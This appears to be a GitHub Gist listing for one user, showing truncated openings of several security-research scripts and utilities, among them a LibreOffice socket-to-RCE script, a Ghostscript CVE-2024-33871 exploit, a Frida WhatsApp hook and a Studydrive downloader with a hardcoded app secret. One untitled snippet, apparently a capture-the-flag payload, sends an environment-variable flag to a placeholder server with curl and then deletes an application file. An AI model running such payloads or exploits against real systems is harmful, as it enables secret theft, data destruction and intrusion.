Romern
Romern
/ long_running.ps
Created
January 1, 2024 22:30
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %!PS-Adobe-3.0 EPSF-3.0 | |
| %%Pages: 1 | |
| %%BoundingBox: 36 36 576 756 | |
| %%LanguageLevel: 1 | |
| %%EndComments | |
| %%BeginProlog | |
| %%EndProlog | |
| % (a) (b) -> (ab) | |
| % https://stackoverflow.com/questions/12378904/postscript-concatenate-two-strings |
Romern
/ whatsapp_override_dismiss.js
Created
February 11, 2024 19:03
Frida script to use WhasApp after the login has failed. This way messages can still be read even if the whatsapp login has been transfered
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Java.enumerateClassLoaders({ | |
| onMatch: function(loader){ | |
| Java.classFactory.loader = loader; | |
| // Hook the class if found, else try next classloader. | |
| try{ | |
| //Override OnDismiss, so we can dismiss the login error dialog without the app closing | |
| LoginFailedDialogFragment = Java.use("com.whatsapp.DisplayExceptionDialogFactory$LoginFailedDialogFragment"); | |
| LoginFailedDialogFragment.onDismiss.implementation = function() {}; | |
| }catch(error){ |
Romern
/ studydrive_download_new.py
Created
February 18, 2024 18:34
Download Studydrive course files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import requests | |
| # app hat ratelimiting für session: | |
| # 'x-ratelimit-limit': '30', 'x-ratelimit-remaining': '0', 'retry-after': '56', 'x-ratelimit-reset': '1708281174' | |
| # from de.veedapp.veed.api_clients.getDocumentStorageUrl | |
| download_secret = "studydrive-app-download-7>%jsc" | |
| base_url = "https://gateway.production-01.studydrive.net" |
Romern
/ libreoffice_domain_socket_to_rce.py
Created
April 23, 2024 00:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pathlib import Path | |
| import socket | |
| import time | |
| # RCE when having access to unix sockets | |
| # TODO: start a named_pipe instead | |
| # first stage: start uno api | |
| # OSL PIPE apparently used for quick starts when libreoffice is already started |
Romern
/ CVE-2024-33871.ps
Last active
June 29, 2024 17:44
CVE-2024-33871 Adapted from https://bugs.ghostscript.com/show_bug.cgi?id=707754.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %!PS | |
| %%% base64 encoding code | |
| % http://www.sunshine2k.de/articles/coding/base64/understanding_base64.html | |
| /base64DecodingTable [ | |
| 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 %/* 0 - 15 */ | |
| 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 %/* 16 - 31 */ | |
| 80 80 80 80 80 80 80 80 80 80 80 62 80 80 80 63 %/* 32 - 47 */ | |
| 52 53 54 55 56 57 58 59 60 61 80 80 80 64 80 80 %/* 48 - 63 */ | |
| 80 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 %/* 64 - 79 */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import base64 | |
| os.system("curl https://MYSERVER/"+base64.b64encode(os.environ["FLAG"].encode()).decode()) | |
| os.system("rm /app/flask.py") | |
| os._exit(1) |
Romern
/ blablacarmatrix.py
Last active
April 5, 2025 07:17
Retrieve blablacar results for multiple days
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import datetime | |
| import click | |
| import tqdm | |
| import uuid | |
| from rich.console import Console | |
| from rich.table import Table | |
| search_url = "https://edge.blablacar.de/trip/search/v7" | |
| location_get_url = 'https://edge.blablacar.de/location/suggestions' |
Romern
/ greeter.cpp
Last active
January 1, 2025 18:21
Calling a c++ class constructor and a function on that constructor using Frida
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <string> | |
| class Greeter { | |
| private: | |
| std::string message; | |
| public: | |
| Greeter(const std::string& msg) : message(msg) {} |
Romern
/ example.py
Created
January 16, 2025 01:07
Windows Search Protocol Python implementation (WIP: only CPMCreateQueryIn correctly implemented)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from wsp.packets import ( | |
| CPMConnectIn, CPMCreateQueryIn, CPMDisconnect, | |
| CColumnSet, CRestrictionArray, CRowsetProperties, CPidMapper, | |
| CColumnGroupArray, PropSpec, CPropertyRestriction, CRestriction | |
| ) | |
| import uuid | |
| def hex_dump(data: bytes, prefix: str = "") -> str: | |
| hex_str = ''.join([f'{b:02x}' for b in data]) | |
| return f"{prefix}{hex_str}" |
Romern
/ appointments.py
Created
February 20, 2025 17:41
adapted from https://github.com/Lasslos/bonn-termine-bot/blob/master/appointments.py. Nutzt "Biometrisches Foto" für die minimalsten 5 minuten slots.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import logging | |
| import re | |
| import json | |
| import http.client as http_client | |
| from html import unescape | |
| from datetime import datetime | |
| class Appointment: |